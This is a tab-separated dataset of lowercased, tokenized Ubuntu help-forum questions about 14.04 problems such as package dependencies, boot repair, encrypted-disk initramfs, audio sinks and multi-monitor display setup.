456801	can not remove evolution indicator	i normally use thunderbird as my email client , but the other day i accidentally started up evolution . now the envelope icon in the indicator area contains information about both thunderbird and evolution . since i 'm not using evolution , i tried to get rid of the evolution information by uninstalling the evolution-indicator package , but this did n't help . i still have both thunderbird and evolution listed when i click the envelope icon . ( and , yes , i did restart the computer . ) the /usr/share/indicators/messages/applications/ directory only contains thunderbird and empathy , not evolution . how do i get rid of the evolution information ?
456806	[ solved ] problem notify popup only display blue bar on ubuntu 14.04	i have ubuntu 14.04 , but not from clean install . i update it from 13.04 - > 13.10 and 14.04 . some day ago , i just realize that some things wrong with it 's notification pop up . it only display blue bar at top left screen . i already reset my unity , but nothing happen . please help , whats is wrong and how to fix this . thanks .
456809	how synaptic `` add downloaded packages '' works ?	i have downloaded deb packages . when i use synaptic- add downloaded packages it just download some packages but not add ( install ) my all packages ( even main package ! ) . according to my assumption , this option should add my deb packages to /var/cache/apt/archives . then prompts to download if any dependency-package missing . then installs packages . however i can installs packages by dpkg -i *.deb . but it not check if any package missing and not prompt to auto download them . so , suggest alternative gui or cli tool [ if not available then appropriate commands ] for dpkg -i *.deb to get above mentioned work efficiently ( check+auto download+install ) or how to solve no-efficient working of synaptic 's add downloaded packages ?
456813	how do i install syncdrive ?	i am trying to install syncdrive in 14.04 . it is showing the following error.. error : dependency is not satisfiable : libboost-filesystem1.49.0 ( > = 1.49.0-1 ) so i installed the libboost-filesystem1.54.0 version from synaptic , but still the error persists . how to proceed ?
456818	regarding installation of ubuntu in phone	i have a nokia 5230 mobile can i install the ubuntu in it ?
456819	ubuntu 14.04 intermittent internet disconnetion	i am using ubuntu 14.04 ( did a clean install from ubuntu 13.10 recently ) on my desktop machine . since the upgrade , my system has started showing strange behavior of intermittent disconnections in browsing . at that specific moment pinging the proxy server times out with more than 80 % packet lost , or is unreachable . during this time the lan connection is 'connected ' , but starts to work only after i reset it . example of packet loss user @ user-desktop : ~ $ ping 192.168.0.51 ping 192.168.0.51 ( 192.168.0.51 ) 56 ( 84 ) bytes of data . 64 bytes from 192.168.0.51 : icmp_seq=13 ttl=128 time=0.283 ms 64 bytes from 192.168.0.51 : icmp_seq=14 ttl=128 time=0.275 ms 64 bytes from 192.168.0.51 : icmp_seq=15 ttl=128 time=0.303 ms 64 bytes from 192.168.0.51 : icmp_seq=16 ttl=128 time=0.272 ms 64 bytes from 192.168.0.51 : icmp_seq=17 ttl=128 time=0.302 ms 64 bytes from 192.168.0.51 : icmp_seq=18 ttl=128 time=0.509 ms 64 bytes from 192.168.0.51 : icmp_seq=19 ttl=128 time=0.570 ms 64 bytes from 192.168.0.51 : icmp_seq=20 ttl=128 time=0.211 ms ^ ? ^c -- - 192.168.0.51 ping statistics -- - 40 packets transmitted , 8 received , 80 % packet loss , time 39100ms rtt min/avg/max/mdev = 0.211/0.340/0.570/0.120 ms example of host unreachable user @ user-desktop : ~ $ ping 192.168.0.51 ping 192.168.0.51 ( 192.168.0.51 ) 56 ( 84 ) bytes of data . from 192.168.1.206 icmp_seq=1 destination host unreachable from 192.168.1.206 icmp_seq=2 destination host unreachable from 192.168.1.206 icmp_seq=3 destination host unreachable from 192.168.1.206 icmp_seq=4 destination host unreachable from 192.168.1.206 icmp_seq=5 destination host unreachable from 192.168.1.206 icmp_seq=6 destination host unreachable from 192.168.1.206 icmp_seq=7 destination host unreachable from 192.168.1.206 icmp_seq=8 destination host unreachable from 192.168.1.206 icmp_seq=9 destination host unreachable from 192.168.1.206 icmp_seq=10 destination host unreachable from 192.168.1.206 icmp_seq=11 destination host unreachable from 192.168.1.206 icmp_seq=12 destination host unreachable -- - 192.168.0.51 ping statistics -- - 13 packets transmitted , 0 received , +12 errors , 100 % packet loss , time 12051ms network information user @ user-desktop : ~ $ ifconfig eth0 link encap : ethernet hwaddr 78 : ac : c0 : bb:67 : d4 inet addr:192.168.1.206 bcast:192.168.1.255 mask:255.255.254.0 inet6 addr : fe80 : :7aac : c0ff : febb:67d4/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:240643 errors:0 dropped:0 overruns:0 frame:0 tx packets:223734 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:25537053 ( 25.5 mb ) tx bytes:17135945 ( 17.1 mb ) interrupt:19 memory : f0100000-f0120000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:478 errors:0 dropped:0 overruns:0 frame:0 tx packets:478 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:67030 ( 67.0 kb ) tx bytes:67030 ( 67.0 kb )
456821	how to put executable to /usr/bin ?	i downloaded eclipse and extracted it to /opt . my question is how can i make it run from terminal as like other programs like javac , java . i did with update-alternatives as follows : sudo update-alternatives -- install `` /usr/bin/eclipse '' `` eclipse '' `` /opt/eclipse/eclipse '' 1 i did n't get any error . i traversed and saw /usr/bin/eclipse was there , so i did : sudo eclipse and i got : sudo : eclipse : command not found is this possible to execute command eclipse and my eclipse would start ? how can i make my user program as one of the executable programs from terminal ? am i using update-alternatives for correct purpose ? any other solution ?
456822	system requirements for installing ubuntu on my pc	i have 2046 mb of ddr3 ram , an intel core 2 duo e7500 processor and asus p5g41c-m lx mother boad can in this system ubuntu 14.04 lts can be installed error free and run smoothly .
456823	dual boot option lost after installing zorin	http : //paste.ubuntu.com/7350510 tried boot repair but no success in regaining dual boot option graham
456826	ubuntu 14.04 does n't install properly on my system	if a try to run the install disc for 14.04 lts it only works in text mode . if i install 13.04 and upgrade to 14.04 only text mode works and i need to install unity manually to make the graphic login screen and desktop but none of my apps work properly . i need to go to text mode to get an error message that reads g_slice_config assertion `` sys_page_size==0 '' error : no monitor detected . this makes no sense because the desktop can be coaxed into appearing if i reinstall it , but an apps window does n't appear properly i get garbage regardless of the app i tried libreoffice , firefox , and update none of their windows appear properly but they worked in ubuntu 13.04 and before . i use a vizio m220mv tv as a monitor and dual radeon hd 7800 as graphics cards and have 32gb of memory , use an eight core amd fx8350 as an processor , 2tb harddrive , and a 250gb solid state drive .
456832	history -- workking with bash to delete current session history however not the full history	$ bash < -- entering this command , right before leaving the session have been hit and miss -- sometime deletes the session 's commands sometime doesn't i do not have history -a in the .bashrc -- - my questions are -- - how to delete a session history without deleting the full history ; which history -c does how to append the history yet still for some sessions that history can be eliminated by issuing bash command ( or any other command ) thanks
456836	can we create bandwidth limit for all users	can we create bandwidth limits for all users ? i want to share internet through my ubuntu server . is this possible or not ?
456838	hdmi audio to samsung tv not working ubuntu 14.04	i have seen many people have had problems with this topic and have tried pretty much every solution i can find ( google is an ubuntu users friend ) but still have not been able to get audio working through hdmi on my laptop with ubuntu 14.04 ( i also had the same problem with 13.10 and 13.04 ) . hence why i am writing this ask ubuntu question ( my last hope ) . when i was running windows 7 this was not an issue . laptop information : 3.13.0-24-generic graphics : hybrid graphics system gpu/vpu : intel hd graphics 3000 and nvidia geforce gt 555m i am currently running the nvidia binary driver - version 331.38 ( from additional drivers ) i also tried using the x.org xserver - nouveau display driver additionally i installed the oem-audio-hda-daily-dkms ( alsa daily builds ) information : the option for hdmi audio does not show up under sound settings so i installed the pulseaudio manager . however the option for hdmi output is always showing up as ( unplugged ) . i also tried the gnome alsamixer with no luck . with the alsamixer i can see the option for s/pdif and even when i unmute it no option appears in the sound settings . i added the grub_cmdline_linux= '' radeon.audio=1 '' option to the /etc/default/grub just for fun ... i checked all the settings on the tv just to make sure i was n't missing anything . i even tried the bumblebee project . let me know if i need to provide any additional information .
456840	way to find which program uses the internet	is there any way to find which program uses the network and the bandwidth consumed . system monitor shows only ram , cpu usage and overall bandwidth usage . i want fr individual program
456841	error : no such partition.entering recue mode ... grub rescue >	sir , i have dual boot along with windows 8.i had set ubuntu as first boot.before some days when i log in ubuntu it was not started due to some ambiguity so i removed the ubuntu partition from disk management.when i restared my laptop it is showing this error : no such partition.entering recue mode ... grub rescue > and no boot options are shown even i have already trying to usb boot . sir please kindly give the solution for it..
456842	check pulseaudio sink volume	is there any command to check the pulseaudio sinks volume . means i want display pulseaudio volume of particular sinks in % i.e . 50 % i already set the volume using pactl set-sinks-volume 1 50 % command . but now i want to check is it 50 % or not . so how can i do this ?
456843	can not install a program that requires libglib	edit : i think the problem was simple incompatibility between my version of ubuntu and the one the software required . you can lock this topic . thanks to nattgew . you see , i need to install certain intel graphic drivers for which i tried to download the `` linux intel graphic driver installer '' ( http : //bit.ly/1kbickm ) . however , when ubuntu software center opens the .deb file it tells that there is a dependency issue because it needs libglib > =2.37.3 version . i have tried to do what i always do in these cases and use the console to update the libraries with `` sudo apt-get install libglib-2.0 '' , but it tells me libglib is already up to date . while i am not good at all with these things , i evena tried to install it by hand . i went to linuxfromscratch ( http : //bit.ly/1hfy9u7 ) , downloaded the libglib2.40.0 library and installed it manually . it apparently worked because the file appears in usr/lib/pkgconfig . the thing is that i am still getting the message of `` dependency issue '' . do you know what could be the problem ? maybe ubuntu software center is not detecting the correct library ?
456848	disable filesystem read cache	how can i disable the linux filesystem read cache for ubuntu 12.04 ? i do not want to only free the actual cache ( echo 3 > /proc/sys/vm/drop_caches ) but disable the read cache completly .
456850	gnome does n't remmember my settings	i recently upgradeed from gnome shell 3.8 to 3.10 . my problem now is each time i power on my computer i must enable my extensions . all the extension are disabled at start . someone has an idea of the origin of my problem ?
456853	both 'minbar ' and 'monajat ' programs dont show up in the unity top bar for ubuntu 14.04 , please help	i installed : ( monojat and minbar ) , via : sudo apt-get install -y minbar monojat ; minbar & ; monojat & ; when i press super and s , i can see them next to the clock , but when i am in a normal workspace , they dont appear . can anyone try to see what can be done to fix this in ubuntu 14.04 ? ( in ubuntu 12~13 there was a whitelist , but these applications still dont show up next to the clock ) . any guidance ? thank you so much !
456854	kdesudo - can it return before spawned process closes ?	kdesudo does n't return until the process started with it exits . so , if i want to start three processes all at the same time , i have to use three terminal tabs . i 'd rather use one tab that returns to the bash prompt as soon as the process , say konsole is launched . that would enable me to launch any number of processes from that one terminal tab . i could then automate it with a script , and launch the processes one by one from there . is there a way to make kdesudo or kdesu or any similar programs work that way ?
456855	remap left shift to ctrl	i want to remap left shift with ctrl and disable left ctrl key . i use a typematrix keyboard where left ctrl is really small . ( or ) if there is a workaround where i can define this emacs alone it would be fantanstic .
456860	will i find only gnu command line tools in ubuntu ?	a couple well known command line tools exist in several versions depending on the unix flavor ( like sed , find , ld ) . i was wondering which versions are available in ubuntu ( i assume gnu for all but i 'd like to confirm that ) ?
456861	how to alt+tab between more than 2 windows in gnome 3 ?	i have recently upgraded ubuntu from 13.04 to 14.04 . soon i have noticed that the most commonly used short cut , alt+tab , had changed its meaning . it switches now only between the current and the previous application . pressing tab more times does not have any effect . i have discovered that super+tab behaves like old alt+tab . i tried to change short cuts , but all changes seem to be completely ignored ( ! ) . how can i repair alt+tab to work as previously ?
456865	unable to load into windows 8 atfer intalling ubuntu 14	i 'm new to ubuntu.i recently installed ubuntu and now i ca n't load into windows 8 . i tried boot repair but it gives error and if i try to go into bios window and then load windows it remains blank forever and would n't load . please help ! boot-repair gives this url http : //paste.ubuntu.com/7351068/
456873	ubuntu packages search for trusty-updates ( $ currentversion-updates )	i find the website http : //packages.ubuntu.com/ quite useful when i am looking for information on packages ( changelog , dependencies ... ) . i do my upgrades at the command line and yesterday i was proposed an update of xterm , so i wanted to go check out what were the changes in this new release . unfortunately , this new package was from trusty-updates , which is not listed in http : //packages.ubuntu.com/ is there a similar ressource where i could get that information ?
456874	14.04 only stable in recovery mode	problem is that if loaded `` normally '' it gets to the desktop screen and then blacks out . i have tried many of the suggested fixes on the net but to no avail and my system is only stable when i start it in recovery mode and then it 's fine . i am not a linux expert , just a competent ubuntu user for many years . system is running vesa : intel ( r ) q33/q35/g33 graphics . any help appreciated
456876	okular stretched aspect ratio in 14.04	since i upgraded to ubuntu 14.04 okular went crazy and renders every pdf in a strange manner . please see the image for an example . i tried reinstalling , purging , allowing for newer sources and installing again but nothing works . does anyone know or have an idea on how to solve this ?
456879	not able to see kate plugin for javascript in kubuntu	i installed kubuntu 14.04 recently . i had heard about the javascript related plugins ( pretty json specifically ) being there in kate setup . but it does not show up in any of the options . i am not sure if i need to install that separately . any help with that regard would be awesome .
456880	installing ubuntu 12.10 amd64 in my vm	i installed ubuntu 12.10 amd64 in my vmplayer . ( host os win-8 , processor : amd a10 apu quadcore ) but the desktop screen seems got stuck after the log-in . the upper-pannel is not visible , though on right click the options are coming . can anyone please suggest me what i 'm lacking . thanks , nazim
456886	check condition in shell script	i have the following command : pactl list sinks | perl -000ne 'if ( / # 1/ ) { / ( volume : . * ) / ; print `` $ 1\n '' } ' it returns the output as : volume : 0 : 50 % 1 : 50 % it denote the pulseaudio volume for sink 1 is 50 % . so i want to check it in if condition the volume < = 50 % or not so how can i do this ?
456888	i installed the wrong version of ubuntu on my computer .	i am running windows 8 natively and have installed ubuntu 14 from their download page . i believe i have installed the 32bit version instead of the 64bit version , because it will not load the option to boot into ubuntu at startup . i have to restart holding shift to get into an option to reboot a sata drive that has this version of ubuntu on it . what is the best course of action here ? uninstall ubuntu ? upgrade somehow ?
456890	dell xps 15 l521x minidisplay to vga detects monitor but does not work	i have an dell xps 15 l521x laptop with an hdmi and minidisplay outputs only . the hdmi port works great but when i 'm trying to connect to a vga output using mini dp - > vga adapter the os detects the external monitor as `` laptop '' or `` internal monitor '' and does not actually send any output to the monitor itself . i browsed the web and found several references to this problem with solutions that did not work for me , such as adding a mode to xrandr ( can i force vga signal output even when xrandr shows 'disconnected ' ? ) , adding a new xorg.conf file ( first answer in external monitor not detected on 13.04 on a dell xps 13 via mini dp ) . i 'm currently running linux mint 15 , and i tested this also with ubuntu 14.04 on a pendrive . here are the system details : $ lspci | grep vga 00:02.0 vga compatible controller : intel corporation 3rd gen core processor graphics controller ( rev 09 ) 01:00.0 vga compatible controller : nvidia corporation gk107m [ geforce gt 640m ] ( rev a1 ) and $ xrandr -q screen 0 : minimum 320 x 200 , current 3840 x 1080 , maximum 32767 x 32767 lvds1 connected 1920x1080+0+0 ( normal left inverted right x axis y axis ) 344mm x 193mm 1920x1080 60.0*+ 59.9 1680x1050 60.0 59.9 1600x1024 60.2 1400x1050 60.0 1280x1024 60.0 1440x900 59.9 1280x960 60.0 1360x768 59.8 60.0 1152x864 60.0 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 vga1 disconnected ( normal left inverted right x axis y axis ) hdmi1 disconnected ( normal left inverted right x axis y axis ) dp1 disconnected ( normal left inverted right x axis y axis ) 1920x1080 60.0 edp-1 connected 1920x1080+1920+0 ( normal left inverted right x axis y axis ) 598mm x 336mm 1920x1080 60.0*+ 60.0 1680x1050 60.0 1400x1050 60.0 1280x1024 75.0 59.9 60.0 1280x960 59.9 1152x864 75.0 60.0 1024x768 75.1 60.0 59.9 800x600 75.0 60.3 59.9 640x480 75.0 60.0 720x400 70.1 dvi-d-1 disconnected ( normal left inverted right x axis y axis ) 1680x1050 ( 0x48 ) 146.2mhz h : width 1680 start 1784 end 1960 total 2240 skew 0 clock 65.3khz v : height 1050 start 1053 end 1059 total 1089 clock 60.0hz 1280x1024 ( 0x4c ) 108.0mhz h : width 1280 start 1328 end 1440 total 1688 skew 0 clock 64.0khz v : height 1024 start 1025 end 1028 total 1066 clock 60.0hz 1024x768 ( 0x51 ) 65.0mhz h : width 1024 start 1048 end 1184 total 1344 skew 0 clock 48.4khz v : height 768 start 771 end 777 total 806 clock 60.0hz 800x600 ( 0x54 ) 40.0mhz h : width 800 start 840 end 968 total 1056 skew 0 clock 37.9khz v : height 600 start 601 end 605 total 628 clock 60.3hz i assume that the dp1 mode that appears in the xrandr output is there only because i added it and not because it was automatically detected . here is a picture of how the gui shows the two monitors and detects both as internal : i am aware that this question is very similar to mini dp port not working in xps 15 l521x but i thought that since that issue seemed to be still open and is different from my situation ( my computer detects the external monitor , but incorrectly ) i will ask again . any help will be appreciated !
456893	utc=no in /etc/default/rcs on a fresh install 14.04 . why ?	i recently installed 14.04 , and decided to do so as a fresh install . i wiped the only ubuntu installation on the system , left a windows 7 installation on , and installed over mdadm ( once with /boot on mdadm and later with it not on mdadm as that saves a few other headaches . i 'm pretty sure what i 'm describing happened in both cases ) . everything from previous ubuntu installations were completely wiped by manual formatting of the relevant partitions . i 'm in a time-zone currently on irish summer time ( utc+01:00 ) . windows started jumping the time an hour ahead . now , i might expect a default windows installation to jump the time an hour back , thinking the utc bios time was the local time , but this was an hour ahead and i had realtimeisuniversal set in the registry to get some saner behaviour out of windows . after some puzzling over this , i realised that in /etc/default/rcs there was the line utc=no to set ubuntu onto local time rather than the normal utc=yes . this is a well-known setting for people who normally only use windows as the illogical choice of local time ( not unambiguous ) means less change for them than fixing windows in a way that ms do n't support , but i certainly did n't set it . this was easily fixed , but as i do n't know what broke it , i do n't know that it wo n't be broken again . is there anything that sets utc=no upon use or installation , and if so can that be blocked ?
456894	ubuntu 12.04 unexpectedly switching into text console	please see the screen shot . i have reinstalled the os several times . but it 's happening again and again . what could be the actual reason for this to happen ?
456895	thunderbird wo n't show any alert or notification for events	i have searched but no chance . i 'm using lightning on ubuntu 14.04 and the reminder is not working . it wo n't show any alert messsage , a popup , a notification and even wo n't play any sound to remind me about the event i have made . i thought maybe that 's because i have made the event private , so i changed it to public , but still nothing . i click on `` new event '' , then set an event at 10:10 while my current pc time is 10:00 , next , set the reminder at `` 5 minutes before '' . i just sit and look at my monitor to see an alert , but the time passes and i see nothing . i go to edit > prefrences > reminder ( tab ) , both options show reminder dialog & show missed reminders are checked . also in reminder defaults section , default reminder setting for both events and tasks are set to on . again in calaendar properties , show reminders option is checked . i also see the alert icon on calendar . nevertheless , i wo n't see any alert or notification yet ! ! should i do something else ?
456900	how to have the entirety of a display used in a multi-head display	i have a laptop triple-head setup : one display is the laptop display , another display is connected via usb ( displaylink ) and another display is connected via hdmi . the hdmi display , which is on the right and rotated 90째 anticlockwise , does not get used completely on first boot . specifically , the lower section of the display is not used , as shown here : when i change the resolution of this right display via the system display settings and then immediately revert the changes , the entirety of the display is used , as shown here : why is this happening and how can i get the display to be used appropriately on first boot ?
456903	ubuntu 14.04 not booting , update-initramfs `` nothing to do , exiting ''	i did a mess while installing ubuntu 14.04 on my xps 15 ( 9530 haswell ) and i need help to rebuild boot partition . my computer has one minisata ssd 32 gb and a 1tb hdd . i crypted both with luks with lvm over it : root @ ubuntu : /boot # lsblk -o name , uuid , mountpoint name uuid mountpoint sda └─sda1 cbe475e3-f468-42eb-88db-8b0c3b537afa └─sda1_crypt ( dm-3 ) tknpdm-4e1r-wazr-f3sj-fv79-eqm7-lmn67l ├─vg_hdd_sys_data-lv_swap ( dm-4 ) 96cc436a-cb46-4a7f-9474-518f5be9ff9a ├─vg_hdd_sys_data-lv_var ( dm-5 ) 38deba4b-b619-4769-813f-0c0f578d2e2f /var └─vg_hdd_sys_data-lv_home ( dm-6 ) 685e392a-8fe3-46e9-8c2f-4c935125a0e5 /home sdb ├─sdb1 df18-fc5d /boot/efi ├─sdb2 804c4cae-3d8e-4f7b-baec-867ee87e46de /boot ├─sdb3 df369b26-8205-488d-a01d-36456a737905 │ └─sdb3_crypt ( dm-0 ) viorjh-o4se-oebc-8xvw-mtnl-uz3o-cmzqvl │ └─vg_ssd_system-lv_root ( dm-1 ) 97a7d810-dc46-415b-9f0f-bf1ee0c2bb01 / └─sdb4 4e094c6d-874e-45ac-84f9-8a0192245551 └─sdb4_crypt ( dm-2 ) 5a18c2b6-197a-42f5-a489-677d3d747b00 /boot/fskey sdc └─sdc1 3795-f7b6 loop0 at first , i 've got to make it work , but i was asked twice for passphrase at boot time , before it asked me for my user password . kind of too much . take a look at my /etc/crypttab : root @ ubuntu : /boot # cat /etc/crypttab sdb3_crypt uuid=df369b26-8205-488d-a01d-36456a737905 none luks , discard sda1_crypt uuid=cbe475e3-f468-42eb-88db-8b0c3b537afa none luks my /etc/fstab : root @ ubuntu : /boot # cat /etc/fstab # < file system > < mount point > < type > < options > < dump > < pass > /dev/mapper/vg_ssd_system-lv_root / ext4 noatime , errors=remount-ro 0 1 # /boot was on /dev/sdb2 during installation uuid=804c4cae-3d8e-4f7b-baec-867ee87e46de /boot ext2 defaults 0 2 # /boot/efi was on /dev/sdb1 during installation uuid=df18-fc5d /boot/efi vfat defaults 0 1 /dev/mapper/vg_hdd_sys_data-lv_home /home ext4 defaults 0 2 /dev/mapper/vg_hdd_sys_data-lv_var /var ext4 defaults 0 2 /dev/mapper/vg_hdd_sys_data-lv_swap none swap sw 0 0 everything was fine until i tried to change it to be asked only once for passphrase at boot time . so i : created one crypted-by-passphrase volume ( sdb4 , 20 mb ) containing a keyfile mounted it on /boot/fskey added this keyfile to my other crypted volumes here follows my new crypttab and fstab : root @ ubuntu : /boot # cat /etc/crypttab sdb4_crypt uuid=4e094c6d-874e-45ac-84f9-8a0192245551 none luks , discard sdb3_crypt uuid=df369b26-8205-488d-a01d-36456a737905 /boot/fskey/keyfile luks , discard sda1_crypt uuid=cbe475e3-f468-42eb-88db-8b0c3b537afa /boot/fskey/keyfile luks root @ ubuntu : /boot # cat /etc/fstab # < file system > < mount point > < type > < options > < dump > < pass > /dev/mapper/vg_ssd_system-lv_root / ext4 noatime , errors=remount-ro 0 1 # /boot was on /dev/sdb2 during installation uuid=804c4cae-3d8e-4f7b-baec-867ee87e46de /boot ext2 defaults 0 2 # /boot/efi was on /dev/sdb1 during installation uuid=df18-fc5d /boot/efi vfat defaults 0 1 /dev/mapper/sdb4_crypt /boot/fskey ext2 defaults 0 2 /dev/mapper/vg_hdd_sys_data-lv_home /home ext4 defaults 0 2 /dev/mapper/vg_hdd_sys_data-lv_var /var ext4 defaults 0 2 /dev/mapper/vg_hdd_sys_data-lv_swap none swap sw 0 0 root @ ubuntu : /boot # mount /dev/mapper/vg_hdd_sys_data-lv_home /home to update these changes to initrd , i did : update-initramfs -u -v -k all when i rebooted , it failed and finished at the drop box . i rebooted with usb live , mounted each partition under /mnt , chrooted to /mnt , moved crypttab to initial configuration and then i reapplied the command above , but this time , all i had is : root @ ubuntu : /boot # update-initramfs -u -v -k all nothing to do , exiting . i rebooted and failed again . i 've got so upset that i did what i should not : root @ ubuntu : /boot # update-initramfs -d -v -k all obviously , things got worse : when i reboot , instead of busybox , i 've got a blank screen with a blinking caps-lock key . i rebooted in recovery mode , so now i see a message : ramdisk : eof while reading compressed data i rebooted it on my usb live key , did again the mount & chroot procedure and tried in vain again to rebuild initrd : root @ ubuntu : /boot # update-initramfs -c -v -k all nothing to do , exiting . any ideas ? i 'm about to reinstalling from zero ubuntu . but i would be glad if one could help me . many thanks , luis
456906	dependency problems running apt-get -f install on ubuntu	on my ubuntu rackspace server uname -a # uname -a linux myserver.com 3.2.0-24-virtual # 39-ubuntu smp mon may 21 18:44:18 utc 2012 x86_64 x86_64 x86_64 gnu/linux apt-get -f install /home # apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : plymouth the following packages will be upgraded : plymouth 1 upgraded , 0 newly installed , 0 to remove and 163 not upgraded . 26 not fully installed or removed . need to get 123 kb of archives . after this operation , 1,024 b of additional disk space will be used . do you want to continue [ y/n ] ? get:1 http : //mirror.rackspace.com/ubuntu/ precise-updates/main plymouth amd64 0.8.2-2ubuntu31.1 [ 123 kb ] fetched 123 kb in 0s ( 747 kb/s ) dpkg : dependency problems prevent configuration of plymouth : plymouth depends on libplymouth2 ( = 0.8.2-2ubuntu31 ) ; however : version of libplymouth2 on system is 0.8.2-2ubuntu31.1 . dpkg : error processing plymouth ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . dpkg : dependency problems prevent configuration of mountall : mountall depends on plymouth ; however : package plymouth is not configured yet . dpkg : error processing mountall ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . dpkg : dependency problems prevent configuration of upstart : upstart depends on mountall ; however : package mountall is not configured yet . dpkg : error processing upstart ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . dpkg : dependency problems prevent configuration of passwd : passwd depends on upstart-job ; however : package upstart-job is not installed . package upstart which provides upstart-job is not configured yet . dpkg : error processing passwd ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of resolvconf : resolvconf depends on upstart-job ; however : package upstart-job is not installed . package upstart which provides upstart-job is not configured yet . dpkg : error processing resolvconf ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already setting up python2.7 ( 2.7.3-0ubuntu3.5 ) ... setting up python ( 2.7.3-0ubuntu2.2 ) ... setting up libgcrypt11 ( 1.5.0-3ubuntu0.2 ) ... setting up libgnutls26 ( 2.12.14-5ubuntu3.7 ) ... setting up libc-dev-bin ( 2.15-0ubuntu10.5 ) ... setting up linux-libc-dev ( 3.2.0-61.92 ) ... setting up libc6-dev ( 2.15-0ubuntu10.5 ) ... setting up libpython2.7 ( 2.7.3-0ubuntu3.5 ) ... setting up libssl-doc ( 1.0.1-4ubuntu5.12 ) ... setting up libssl-dev ( 1.0.1-4ubuntu5.12 ) ... setting up python2.7-dev ( 2.7.3-0ubuntu3.5 ) ... setting up python-dev ( 2.7.3-0ubuntu2.2 ) ... setting up tzdata-java ( 2014a-0ubuntu0.12.04 ) ... dpkg : dependency problems prevent configuration of ifupdown : ifupdown depends on upstart-job ; however : package upstart-job is not installed . package upstart which provides upstart-job is not configured yet . dpkg : error processing ifupdown ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of procps : procps depends on upstart-job ; however : package upstart-job is not installed . package upstart which provides upstart-job is not configured yet . dpkg : error processing procps ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of udev : udev depends on upstart-job ; however : package upstart-job is not installed . package upstart which provides upstart-job is not configured yet . udev depends on procps ; however : package procps is not configured yet . udev depends on upstart ( > = 1.4-0ubuntu6 ) ; however : package upstart is not configured yet . dpkg : error processing udev ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of dmsetup : dmsetup depends on udev ( > > 141-2 ) ; however : package udev is not configured yet . dpkg : error processing dmsetup ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of initramfs-tools : initramfs-tools depends on udev ( > = 147~-5 ) ; however : package udev is not configured yet . dpkg : error processing initramfs-tools ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of libdevmapper1.02.1 : libdevmapper1.02.1 depends on dmsetup ( > = 2:1.02.48-4ubuntu7.4 ) ; however : package dmsetup is not configured yet . dpkg : error processing libdevmapper1.02.1 ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of apparmor : apparmor depends on initramfs-tools ; however : package initramfs-tools is not configured yet . dpkg : error processing apparmor ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of ntfs-3g : ntfs-3g depends on initramfs-tools ( > = 0.99 ) ; however : package initramfs-tools is not configured yet . dpkg : error processing ntfs-3g ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already processing triggers for libc-bin ... ldconfig deferred processing now taking place errors were encountered while processing : plymouth mountall upstart passwd resolvconf ifupdown procps udev dmsetup initramfs-tools libdevmapper1.02.1 apparmor ntfs-3g e : sub-process /usr/bin/dpkg returned an error code ( 1 ) dpkg -- audit /home # dpkg -- audit the following packages have been unpacked but not yet configured . they must be configured using dpkg -- configure or the configure menu option in dselect for them to work : initramfs-tools tools for generating an initramfs procps /proc file system utilities ntfs-3g read/write ntfs driver for fuse ifupdown high level tools to configure network interfaces mountall filesystem mounting tool resolvconf name server information handler libdevmapper1.02.1 the linux kernel device mapper userspace library plymouth graphical boot animation and logger - main package upstart event-based init daemon passwd change and administer password and group data dmsetup the linux kernel device mapper userspace library udev rule-based device node and kernel event manager apparmor user-space parser utility for apparmor what i have tried without success 494 apt-get -- purge -f remove 495 apt-get -f install 496 dpkg -- audit 497 dpkg -- configure -a 498 apt-get -f dist-upgrade 499 apt-get clean 500 apt-get dist-upgrade 501 apt-get -f install any further recommendations ?
456908	how to pass string variable as parameter to awk	i have following command : usb_soundcard_sink= $ ( pactl list short sinks | grep `` alsa_output '' | awk ' { print $ 2 } ' | tail -n1 ) output of this command is : alsa_output.pci-0000_00_1b.0.analog-stereo and this is another command that find index number : var= $ ( pactl list short sinks | awk ' $ 2== '' alsa_output.pci-0000_00_1b.0.analog-stereo '' { print $ 1 } ' ) output : 0 but i want pass the `` usb_soundcard_sink '' variable instead of hard coded value i.e . `` alsa_output.pci-0000_00_1b.0.analog-stereo '' in above command . b'coz value of `` usb_soundcard_sink '' variable may change dynamically . also i tried the following : var= $ ( pactl list short sinks | awk ' $ 2== '' $ usb_soundcard_sink '' { print $ 1 } ' ) but it is not working so how can i pass value of `` usb_soundcard_sink '' variable to the above command
456911	how to move a window if titlebar is overlapped by ubuntu menu	okey i know this is a duplicate of : how to move a window if titlebar is overlapped by ubuntu menu but some smuck would n't let me comment , so i had to start a new question . all the proposed answers using alt work , but are temporarily ! is there a permanent solution ? i have some windows that open for some reason in this position . it seems ubuntu is n't remembering the new position .
456912	error install ubuntu on lenovo notebook g510	i 'm tried to install ubuntu desktop 14.04 on my notebook lenovo g510 ( amd radeon hd8570 ) but after installation finished when os starting display following massagge : the system is running in low-graphics mode . could someone please help me to solve this problem ? thank 's in advance maurizio
